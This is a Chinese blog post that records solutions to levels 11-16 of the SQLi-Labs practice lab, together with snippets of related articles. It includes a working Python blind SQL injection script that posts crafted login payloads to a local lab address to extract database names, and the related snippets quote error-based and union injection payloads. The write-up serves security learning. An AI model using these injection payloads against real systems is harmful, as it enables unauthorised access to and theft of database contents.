sqlilab闯关记录(11-16)

最新推荐文章于 2024-09-09 22:34:29 发布
最新推荐文章于 2024-09-09 22:34:29 发布
阅读量331 收藏 6
点赞数 8
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30570001/article/details/135749941
版权
文章介绍了如何使用万能密码和盲注技术,通过Python脚本实现对11-16关SqliLabs中的SQL注入漏洞进行攻击,获取数据库名。作者提到这些关卡的解决方案是常规套路,鼓励读者自行尝试或参考其他资源。
摘要由CSDN通过智能技术生成

11-16关是post请求

11,12 关用  万能密码既可以解决。拿到所有数据。

13-16 关用盲注即可。只是闭合方式不同。没什么新的知识点,直接上脚本

import requests


flag=" \~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#\"!"
result=''

for i in range(100):
    for j in range(len(flag)):
        Mypayload={"uname":f"1') or 1=1 and if(ord(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))=ord('{flag[j]}'),1,0) #","passwd":"1","submit":"Submit"}
        contents=requests.request('post','http://192.168.43.231/sqli-labs/Less-13/',data=Mypayload)
        if 'flag.jpg' in contents.text:
            result+=flag[j]
            print("database_name:"+result)

这几关的闭合方式都是常规套路,因为懒就不一一呈现了。大家可以自己去试试。或者看其他师傅的博客。都很详细的。

0xFF_red
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilab1-10关记录
ckkkk__d的博客
03-26 167
如果增加一个’反引号使id=‘$id’闭合则剩一个’ 被注释后(--+ || --%20||%23),中间部分即可任由我们操作。首先查数据库表名从information的schema库的tables中查找当前数据库名下的表。分析该片段以及键入?最后查询users表中的username与password。后在4时出现报错提示,可以得出表一共有3列。函数在使用时前后列数需要一致故进行第二步。后出现2,3可以判断23位置为回显点。分别查询数据库版本与数据库名。没有报错则说明可以注入。使用联合输出表名即可解决。
sqlilabs第17关
wh1sper、的博客
04-29 1284
sqlilabs第17关一、分析二、手注 一、分析 这关题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
Sqlilab闯关记录11~20)(白盒测试)
m0_56375711的博客
12-05 810
Sqlilab闯关记录11~20)(白盒测试)
sqlilab闯关记(5-6)
qq_30570001的博客
01-20 824
id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+拿表名。3、方法一、floor报错注入:?:floor报错原理解析。
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs闯关1-1
Darklord.W
06-30 474
sqli-labs闯关1-1 在线练习网址http://43.247.91.228:84/ 首先,进入sqli-labs 1-1 输入http://43.247.91.228:84/Less-1/?id=1 输入http://43.247.91.228:84/Less-1/?id=1’ 用and1=1和and1=2,结果显示它为字符型注入 http://43.247.91.228:84/Less-...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1393
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
【渗透测试】sqli-labs闯关(18-24)
qq_43168364的博客
08-22 907
第十八关:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一关我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
数据同步是如何实现的?为什么需要数据同步?
oOBubbleX的博客
09-05 872
实时数据同步,确保数据的一致性和实时更新性,将有利于企业各部门之间高效协作,从而支持企业的业务运作和决策。本文将介绍数据同步概念、数据同步的步骤、数据同步的方式,从而加深对数据同步的认识。
spring事务详细讲解-深入浅出
小电玩
09-08 322
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
万物皆有灵
09-09 227
在这个快速发展的数字时代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
如何防止常见的Web应用安全漏洞!
MJH827的博客
09-04 823
Web应用的广泛使用伴随着各种安全威胁。近年来,许多企业因忽视Web应用的安全性而遭受重大损失。本文将介绍几种常见的Web应用安全漏洞,并提供具体的防护方案和实战演练。
分布式事务
2301_80339238的博客
09-04 975
通过前面微服务保护中,我们知道当项目拆分到不同服务后,每个服务都有自己独立的数据库,独立的tomcat,所以事务的ACID的这种特性就没法满足了。例如下面我们订单服务调用了购物车服务和库存服务,如果调用库存服务出现失败,尽管可以通过抛出异常控制订单服务回滚,但是购物车服务不能感知到异常的。在分布式系统中,如果一个业务需要多个服务合作完成,并且每一个服务都有事务,多个事务必须同时成功或失败,这样的事务就是分布式事务。其中的每个服务的事务就是一个分支事务。整个业务称为全局事务。
PLSQL-将一份excel数据导入到一张物理表(Oracle)
最新发布
qq_38294275的博客
09-09 307
在Oracle中,FOR UPDATE子句用于SELECT语句中,以便在检索数据的同时锁定这些数据,防止其他会话在此期间修改它们。这个子句通常用于需要确保数据一致性的情况,特别是在多用户环境中,当多个会话可能同时尝试修改相同的数据时。研究了半天,看网上说的可以用:Tools → ODBC Importer ,然后再选择csv啥的即可,一打开我的PLSQL,啊,空白的啊,啥都没有…最后的最后,记得插入的数据/excel文件,要在第一列新增一列,空白也行/ID也行,总之要再插入一列,这样数据就不会错位。
jmeter之setUP、tearDown线程组
回家吃月饼的学习交流地
09-07 444
jmeter之setUP、tearDown线程组的使用
MySQL MHA
2201_75549363的博客
09-09 570
该参数代表忽略上次 MHA 触发切换产生的文件,默认情况下,MHA 发生切换后会在日志记录,也就是上面设置的日志app1.failover.complete文件,下次再次切换的时候如果发现该目录下存在该文件将不允许触发切换,除非在第一次切换后收到删除该文件,为了方便,这里设置为--ignore_last_failover。master_ip_failover_script=/usr/local/bin/master_ip_failover  #设置自动failover时候的切换脚本,也就是上面的那个脚本。
MyBatis面试
Tony_yitao的博客
09-09 401
MyBatis面试
sqli dumb闯关
07-28
- *1* *2* *3* [【渗透测试】sqli-labs闯关(11-17)](https://blog.csdn.net/qq_43168364/article/details/105650210)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值